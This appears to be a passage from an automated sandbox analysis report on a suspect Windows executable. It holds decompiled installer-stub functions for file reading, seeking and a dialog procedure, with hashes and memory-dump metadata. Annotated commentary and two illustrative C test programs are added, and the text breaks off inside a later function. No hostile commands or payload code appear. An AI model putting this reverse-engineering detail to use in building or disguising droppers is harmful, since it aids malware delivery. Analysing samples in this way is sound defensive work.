                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 4115351271-3357198990
                                                                              • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                              • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                              • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                              • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 68%
                                                                              			E00405690(CHAR* _a4, long _a8, long _a12) {
                                                                              				signed int _t5;
                                                                              				void* _t6;
                                                                              
                                                                              				_t5 = GetFileAttributesA(_a4); // executed
                                                                              				asm("sbb ecx, ecx");
                                                                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                              				return _t6;
                                                                              			}

                                                                              0x00405694
                                                                              0x004056a1
                                                                              0x004056b6
                                                                              0x004056bc

                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                              • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                              • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                              • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004030CD(void* _a4, long _a8) {
                                                                              				int _t6;
                                                                              				long _t10;
                                                                              
                                                                              				_t10 = _a8;
                                                                              				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                                                              				if(_t6 == 0 || _a8 != _t10) {
                                                                              					return 0;
                                                                              				} else {
                                                                              					return 1;
                                                                              				}
                                                                              			}

                                                                              Instruction address column for the C code above: addresses 0x004030d1 through 0x004030f5 (0x00000000 entries are source lines with no instruction).

                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                              • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                              • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                              • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004030FF(long _a4) {
                                                                              				long _t2;

                                                                              				// Absolute seek (dwMoveMethod 0 = FILE_BEGIN, no high DWORD) on the global
                                                                              				// handle at 0x409020, the same one the ReadFile wrapper E004030CD reads from.
                                                                              				// The call context recorded below ("Error writing temporary file...") shows it
                                                                              				// being used while the stub writes its payload out to a temporary file.
                                                                              				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                                              				return _t2; // new file position, or INVALID_SET_FILE_POINTER (0xFFFFFFFF) on failure; returned to the caller unchecked
                                                                              			}




                                                                              Instruction address column for the C code above: 0x0040310d, 0x00403113.

                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                              • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                              • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                              • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
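
The two executed wrappers above (E004030FF seeking on the global handle, E004030CD reading from it) form a seek-then-read-exactly pair: the reader refuses to treat a short read as success. The following C program is an added example, not code from this report or from the sample, that reproduces that check with stdio on a constructed temporary file. The 64-byte "stub" followed by a 16-byte "payload", the offset 64, and the function names read_exact / seek_abs are assumptions made for illustration, not the sample's real layout.

```c
#include <stdio.h>
#include <string.h>

/* Mirror of the stub's ReadFile wrapper: succeed only when the whole request
 * was satisfied. A short read (EOF reached, truncated input) is failure, so a
 * caller never consumes a half-filled buffer as if it were complete. */
static int read_exact(FILE *f, void *buf, size_t want)
{
    size_t got = fread(buf, 1, want, f);
    return got == want ? 1 : 0;
}

/* Mirror of the stub's SetFilePointer wrapper: absolute seek from file start. */
static int seek_abs(FILE *f, long offset)
{
    return fseek(f, offset, SEEK_SET) == 0;
}

/* Constructed input (an assumption for this example, NOT the sample's layout):
 * a 64-byte fake stub beginning with "MZ", then a 16-byte payload. */
static FILE *make_constructed_file(void)
{
    static const unsigned char stub[64] = { 'M', 'Z' };   /* remaining bytes zero */
    static const char payload[] = "PAYLOAD-BYTES-01";    /* 16 bytes, NUL excluded */
    FILE *f = tmpfile();
    if (!f) return NULL;
    fwrite(stub, 1, sizeof stub, f);
    fwrite(payload, 1, sizeof payload - 1, f);
    fflush(f);
    return f;
}

/* Read the 16-byte payload at offset 64: the full-length request succeeds
 * and the bytes match. Returns 1 on success, 0 otherwise, -1 on setup error. */
int demo_full_read(void)
{
    char buf[16];
    FILE *f = make_constructed_file();
    if (!f) return -1;
    int ok = seek_abs(f, 64) && read_exact(f, buf, sizeof buf);
    int match = ok && memcmp(buf, "PAYLOAD-BYTES-01", 16) == 0;
    fclose(f);
    return match;
}

/* Ask for 32 bytes where only 16 remain: fread returns 16, the wrapper reports
 * failure. Returns 1 when the short read was correctly rejected. */
int demo_short_read_rejected(void)
{
    char buf[32];
    FILE *f = make_constructed_file();
    if (!f) return -1;
    int ok = seek_abs(f, 64) && read_exact(f, buf, sizeof buf);
    fclose(f);
    return ok == 0;
}

int main(void)
{
    printf("full read ok: %d\n", demo_full_read());
    printf("short read rejected: %d\n", demo_short_read_rejected());
    return 0;
}
```

The point worth carrying over to triage: a stub that reads an appended payload this way fails closed on a truncated sample, so a partially downloaded or deliberately cut file will not be unpacked, which is one reason a sandbox run of a truncated submission can look inert.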

                                                                              Non-executed Functions

                                                                              C-Code - Quality: 89%
                                                                              			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                                                              				// Dialog procedure: _a4 = hWnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
                                                                              				// Numeric message and control constants are the standard Win32 / common-controls
                                                                              				// values; the comments name them for readability and follow only what the code does.
                                                                              				struct HWND__* _v8;
                                                                              				struct tagRECT _v24;
                                                                              				void* _v32;
                                                                              				signed int _v36;
                                                                              				int _v40;
                                                                              				CHAR* _v44;
                                                                              				signed int _v48;
                                                                              				int _v52;
                                                                              				void* _v56;
                                                                              				void* _v64;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				long _t86;
                                                                              				struct HMENU__* _t88;
                                                                              				unsigned int _t91;
                                                                              				int _t93;
                                                                              				int _t94;
                                                                              				void* _t100;
                                                                              				intOrPtr _t123;
                                                                              				struct HWND__* _t127;
                                                                              				int _t148;
                                                                              				int _t149;
                                                                              				struct HWND__* _t153;
                                                                              				struct HWND__* _t157;
                                                                              				struct HMENU__* _t159;
                                                                              				long _t161;
                                                                              				CHAR* _t162;
                                                                              				CHAR* _t163;

                                                                              				_t153 =  *0x7a2764; // global: the list-view control handle, stored by the WM_INITDIALOG branch below
                                                                              				_t148 = 0;
                                                                              				_v8 = _t153;
                                                                              				if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
                                                                              					if(_a8 == 0x405) { // WM_USER+5 (private message): start a worker thread, passing it the progress-bar control (ID 0x3ec)
                                                                              						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                                                              					}
                                                                              					if(_a8 != 0x111) { // 0x111 = WM_COMMAND
                                                                              						L16:
                                                                              						if(_a8 != 0x404) { // WM_USER+4 (private message)
                                                                              							L24:
                                                                              							if(_a8 != 0x7b || _a12 != _t153) { // 0x7b = WM_CONTEXTMENU, handled only when it targets the list view
                                                                              								goto L19;
                                                                              							} else {
                                                                              								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148); // LVM_GETITEMCOUNT
                                                                              								_a8 = _t86;
                                                                              								if(_t86 <= _t148) { // empty list: nothing to copy
                                                                              									L36:
                                                                              									return 0;
                                                                              								}
                                                                              								_t88 = CreatePopupMenu();
                                                                              								_push(0xffffffe1);
                                                                              								_push(_t148);
                                                                              								_t159 = _t88;
                                                                              								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159)); // one menu item with ID 1; its caption comes from E004059E1
                                                                              								_t91 = _a16;
                                                                              								if(_t91 != 0xffffffff) { // lParam carries the click position: x in the low word, y in the high word
                                                                              									_t149 = _t91;
                                                                              									_t93 = _t91 >> 0x10;
                                                                              								} else { // keyboard-invoked (lParam = -1): anchor the menu at the list view's top-left corner
                                                                              									GetWindowRect(_t153,  &_v24);
                                                                              									_t149 = _v24.left;
                                                                              									_t93 = _v24.top;
                                                                              								}
                                                                              								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148); // 0x180 = TPM_NONOTIFY | TPM_RETURNCMD: returns the chosen item ID
                                                                              								_t161 = 1; // running buffer size; the 1 reserves the terminating NUL
                                                                              								if(_t94 == 1) { // the single menu item was chosen: copy every list entry to the clipboard
                                                                              									// &_v64 is an LVITEM here: _v56 = iSubItem, _v44 = pszText, _v40 = cchTextMax.
                                                                              									_v56 = _t148;
                                                                              									_v44 = 0x79f580; // scratch buffer used only by the sizing pass
                                                                              									_v40 = 0xfff;
                                                                              									_a4 = _a8;
                                                                              									do { // pass 1, last item downward: LVM_GETITEMTEXTA returns the character count; +2 per line for CRLF
                                                                              										_a4 = _a4 - 1;
                                                                              										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                              									} while (_a4 != _t148);
                                                                              									OpenClipboard(_t148);
                                                                              									EmptyClipboard();
                                                                              									_t100 = GlobalAlloc(0x42, _t161); // GMEM_MOVEABLE | GMEM_ZEROINIT, so the final NUL is already in place
                                                                              									_a4 = _t100;
                                                                              									_t162 = GlobalLock(_t100);
                                                                              									do { // pass 2, first item upward: fetch each text straight into the clipboard block with the same cchTextMax as pass 1
                                                                              										_v44 = _t162;
                                                                              										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                                                              										_t163 =  &(_t162[lstrlenA(_t162)]);
                                                                              										 *(unsigned short*)_t163 = 0x0a0d; // 16-bit store of "\r\n" (the decompiler rendered it as a byte store through a CHAR*)
                                                                              										_t162 =  &(_t163[2]);
                                                                              										_t148 = _t148 + 1;
                                                                              									} while (_t148 < _a8);
                                                                              									GlobalUnlock(_a4);
                                                                              									SetClipboardData(1, _a4); // CF_TEXT; ownership of the block passes to the clipboard
                                                                              									CloseClipboard();
                                                                              								}
                                                                              								goto L36;
                                                                              							}
                                                                              						}
                                                                              						// WM_USER+4
                                                                              						if( *0x7a274c == _t148) {
                                                                              							ShowWindow( *0x7a2f84, 8); // SW_SHOWNA
                                                                              							if( *0x7a300c == _t148) {
                                                                              								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                                                              							}
                                                                              							E00403D80(1);
                                                                              							goto L24;
                                                                              						}
                                                                              						 *0x79e950 = 2;
                                                                              						E00403D80(0x78);
                                                                              						goto L19;
                                                                              					} else {
                                                                              						if(_a12 != 0x403) { // WM_COMMAND: only the button with control ID 0x403 is handled here
                                                                              							L19:
                                                                              							return E00403E0E(_a8, _a12, _a16); // everything else goes to the shared handler
                                                                              						}
                                                                              						ShowWindow( *0x7a2750, _t148); // SW_HIDE the button ...
                                                                              						ShowWindow(_t153, 8); // ... and reveal the list view (SW_SHOWNA)
                                                                              						E0040417A();
                                                                              						goto L16;
                                                                              					}
                                                                              				}
                                                                              				// WM_INITDIALOG. &_v56 is an LVCOLUMN: _v56 = mask, _v52 = fmt, _v48 = cx, _v44 = pszText, _v40 = cchTextMax, _v36 = iSubItem.
                                                                              				_v48 = _v48 | 0xffffffff;
                                                                              				_v36 = _v36 | 0xffffffff;
                                                                              				_v56 = 2; // LVCF_WIDTH
                                                                              				_v52 = 0;
                                                                              				_v44 = 0;
                                                                              				_v40 = 0;
                                                                              				asm("stosd");
                                                                              				asm("stosd");
                                                                              				_t123 =  *0x7a2f88; // settings block; the values at +0x5c and +0x60 are used below as list-view colours (negative = leave default)
                                                                              				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                              				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                              				 *0x7a2750 = GetDlgItem(_a4, 0x403); // the button whose click reveals the list view (see the WM_COMMAND branch)
                                                                              				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                                                              				_t127 = GetDlgItem(_a4, 0x3f8); // the list view
                                                                              				 *0x7a2764 = _t127;
                                                                              				_v8 = _t127;
                                                                              				E00403DDC( *0x7a2750);
                                                                              				 *0x7a2754 = E004045FA(4);
                                                                              				 *0x7a276c = 0;
                                                                              				GetClientRect(_v8,  &_v24);
                                                                              				_v48 = _v24.right - GetSystemMetrics(0x15); // column width = client width minus SM_CXVSCROLL
                                                                              				SendMessageA(_v8, 0x101b, 0,  &_v56); // LVM_INSERTCOLUMNA
                                                                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // LVM_SETEXTENDEDLISTVIEWSTYLE: LVS_EX_LABELTIP
                                                                              				if(_a8 >= 0) {
                                                                              					SendMessageA(_v8, 0x1001, 0, _a8); // LVM_SETBKCOLOR
                                                                              					SendMessageA(_v8, 0x1026, 0, _a8); // LVM_SETTEXTBKCOLOR
                                                                              				}
                                                                              				if(_a12 >= _t148) {
                                                                              					SendMessageA(_v8, 0x1024, _t148, _a12); // LVM_SETTEXTCOLOR
                                                                              				}
                                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                              				_push(0x1b);
                                                                              				E00403DA7(_a4);
                                                                              				if(( *0x7a2f90 & 0x00000003) != 0) { // flag bit 1 or 2 set: hide the button; bit 2 also drops its handle, otherwise show the list view immediately
                                                                              					ShowWindow( *0x7a2750, _t148);
                                                                              					if(( *0x7a2f90 & 0x00000002) != 0) {
                                                                              						 *0x7a2750 = _t148;
                                                                              					} else {
                                                                              						ShowWindow(_v8, 8);
                                                                              					}
                                                                              				}
                                                                              				_t157 = GetDlgItem(_a4, 0x3ec); // the progress bar
                                                                              				SendMessageA(_t157, 0x401, _t148, 0x75300000); // PBM_SETRANGE, MAKELPARAM(0, 30000)
                                                                              				if(( *0x7a2f90 & 0x00000004) != 0) { // flag bit 4: apply the same two colours to the progress bar
                                                                              					SendMessageA(_t157, 0x409, _t148, _a12); // PBM_SETBARCOLOR
                                                                              					SendMessageA(_t157, 0x2001, _t148, _a8); // PBM_SETBKCOLOR
                                                                              				}
                                                                              				goto L36;
                                                                              			}
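
The WM_CONTEXTMENU path of E00404EA0 sizes its clipboard block in one pass (1 byte for the NUL, then length + 2 per item) and fills it in a second, relying on LVM_GETITEMTEXT truncating identically in both passes because the same cchTextMax (0xfff) is used. The following C program is an added example, not code from this report or from the sample, that models that arithmetic with a stand-in for LVM_GETITEMTEXT and checks that the bytes written never exceed the allocation, including the case of an item longer than cchTextMax. The item strings, the cch_max value of 32, and the function names are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for LVM_GETITEMTEXT (an assumption for this example): copy at most
 * cch_max-1 characters of the item's text into dst, NUL-terminate, and return
 * the number of characters copied. Because truncation depends only on cch_max,
 * the sizing pass and the copying pass observe identical lengths. */
static int get_item_text(const char *const *items, int idx, char *dst, int cch_max)
{
    size_t n = strlen(items[idx]);
    if (n >= (size_t)cch_max) n = (size_t)cch_max - 1;
    memcpy(dst, items[idx], n);
    dst[n] = '\0';
    return (int)n;
}

/* Two-pass export mirroring the decompiled routine. Returns a malloc'd buffer
 * holding "item\r\n" for every item, NUL-terminated, and stores the allocation
 * size in *out_size. Returns NULL for an empty list, like the early `return 0`. */
char *export_items_crlf(const char *const *items, int count, int cch_max, size_t *out_size)
{
    if (count <= 0) return NULL;
    char scratch[4096];                         /* stands in for the stub's 0xfff-char scratch buffer */
    size_t total = 1;                           /* the terminating NUL */
    for (int i = count - 1; i >= 0; i--)        /* pass 1 walks downward, as the stub does */
        total += (size_t)get_item_text(items, i, scratch, cch_max) + 2;

    char *buf = calloc(total, 1);               /* GMEM_ZEROINIT equivalent: final NUL already present */
    if (!buf) return NULL;
    char *p = buf;
    for (int i = 0; i < count; i++) {           /* pass 2 walks upward, writing straight into the block */
        get_item_text(items, i, p, cch_max);    /* same cch_max as pass 1, so the length cannot grow */
        p += strlen(p);
        p[0] = '\r';                            /* the 16-bit 0x0a0d store */
        p[1] = '\n';
        p += 2;
    }
    if (out_size) *out_size = total;
    return buf;
}

/* Self-check on constructed items: 1 when the written text plus its NUL exactly
 * fills the allocation and a 63-character item was truncated to cch_max-1 = 31
 * characters in both passes; 0 otherwise. */
int demo_export_is_exact(void)
{
    char longitem[64];
    memset(longitem, 'A', sizeof longitem - 1);
    longitem[sizeof longitem - 1] = '\0';
    const char *items[] = { "Extract: foo.dll", "", longitem };   /* constructed sample entries */

    size_t size = 0;
    char *out = export_items_crlf(items, 3, 32, &size);
    if (!out) return 0;

    char expect_tail[34];                       /* 31 'A' + "\r\n" + NUL */
    memset(expect_tail, 'A', 31);
    expect_tail[31] = '\r';
    expect_tail[32] = '\n';
    expect_tail[33] = '\0';

    int ok = strlen(out) + 1 == size                                 /* 18 + 2 + 33 + 1 == 54 */
          && strncmp(out, "Extract: foo.dll\r\n\r\n", 20) == 0
          && strcmp(out + 20, expect_tail) == 0;
    free(out);
    return ok;
}

int main(void)
{
    printf("allocation exact and truncation consistent: %d\n", demo_export_is_exact());
    return 0;
}
```

The invariant the example exercises is the one that would matter if this code were ever not benign installer UI: the copy pass must never be able to return more characters than the sizing pass counted, and here it cannot, because both pass the same cchTextMax and the zero-initialised allocation supplies the final NUL.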
































                                                                              Instruction address column for the C code above: addresses between 0x00404ea9 and 0x00405215 (0x00000000 entries are source lines with no instruction).
                                                                              0x00404edf
                                                                              0x00404ee0
                                                                              0x00404ef9
                                                                              0x00404efc
                                                                              0x00404f06
                                                                              0x00404f15
                                                                              0x00404f1d
                                                                              0x00404f25
                                                                              0x00404f2a
                                                                              0x00404f2d
                                                                              0x00404f39
                                                                              0x00404f42
                                                                              0x00404f4b
                                                                              0x00404f6e
                                                                              0x00404f74
                                                                              0x00404f85
                                                                              0x00404f8a
                                                                              0x00404f98
                                                                              0x00404fa6
                                                                              0x00404fa6
                                                                              0x00404fab
                                                                              0x00404fb9
                                                                              0x00404fb9
                                                                              0x00404fbe
                                                                              0x00404fc1
                                                                              0x00404fc6
                                                                              0x00404fd2
                                                                              0x00404fdb
                                                                              0x00404fe8
                                                                              0x00404ff7
                                                                              0x00404fea
                                                                              0x00404fef
                                                                              0x00404fef
                                                                              0x00404fe8
                                                                              0x0040500c
                                                                              0x00405015
                                                                              0x0040501e
                                                                              0x0040502e
                                                                              0x0040503a
                                                                              0x0040503a
                                                                              0x00000000

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00404EFF
                                                                              • GetDlgItem.USER32 ref: 00404F0E
                                                                              • GetDlgItem.USER32 ref: 00404F1D
                                                                                • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                              • GetClientRect.USER32 ref: 00404F4B
                                                                              • GetSystemMetrics.USER32 ref: 00404F53
                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                              • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                              • GetDlgItem.USER32 ref: 00405005
                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                              • GetDlgItem.USER32 ref: 00405057
                                                                              • CreateThread.KERNEL32 ref: 00405065
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                              • ShowWindow.USER32(00000000), ref: 00405090
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                              • ShowWindow.USER32(00000008), ref: 004050DB
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                              • CreatePopupMenu.USER32 ref: 0040511E
                                                                              • AppendMenuA.USER32 ref: 00405133
                                                                              • GetWindowRect.USER32 ref: 00405146
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                              • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                              • GlobalLock.KERNEL32 ref: 004051CC
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                              • SetClipboardData.USER32 ref: 00405209
                                                                              • CloseClipboard.USER32 ref: 0040520F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                              • String ID: {
                                                                              • API String ID: 1050754034-366298937
                                                                              • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                              • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                              • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                              • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 93%
                                                                              			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                              				struct HWND__* _v8;
                                                                              				struct HWND__* _v12;
                                                                              				signed int _v16;
                                                                              				intOrPtr _v20;
                                                                              				struct HBITMAP__* _v24;
                                                                              				long _v28;
                                                                              				int _v32;
                                                                              				signed int _v40;
                                                                              				int _v44;
                                                                              				signed int* _v56;
                                                                              				intOrPtr _v60;
                                                                              				signed int _v64;
                                                                              				long _v68;
                                                                              				void* _v72;
                                                                              				intOrPtr _v76;
                                                                              				intOrPtr _v80;
                                                                              				void* _v84;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				struct HWND__* _t182;
                                                                              				int _t196;
                                                                              				long _t202;
                                                                              				signed int _t206;
                                                                              				signed int _t217;
                                                                              				void* _t220;
                                                                              				void* _t221;
                                                                              				int _t227;
                                                                              				signed int _t232;
                                                                              				signed int _t233;
                                                                              				signed int _t240;
                                                                              				void* _t252;
                                                                              				intOrPtr _t258;
                                                                              				char* _t268;
                                                                              				signed char _t269;
                                                                              				long _t274;
                                                                              				int _t280;
                                                                              				signed int* _t281;
                                                                              				int _t282;
                                                                              				long _t283;
                                                                              				int _t285;
                                                                              				long _t286;
                                                                              				signed int _t287;
                                                                              				long _t288;
                                                                              				signed int _t291;
                                                                              				signed int _t298;
                                                                              				signed int _t300;
                                                                              				signed int _t302;
                                                                              				int* _t310;
                                                                              				void* _t311;
                                                                              				int _t315;
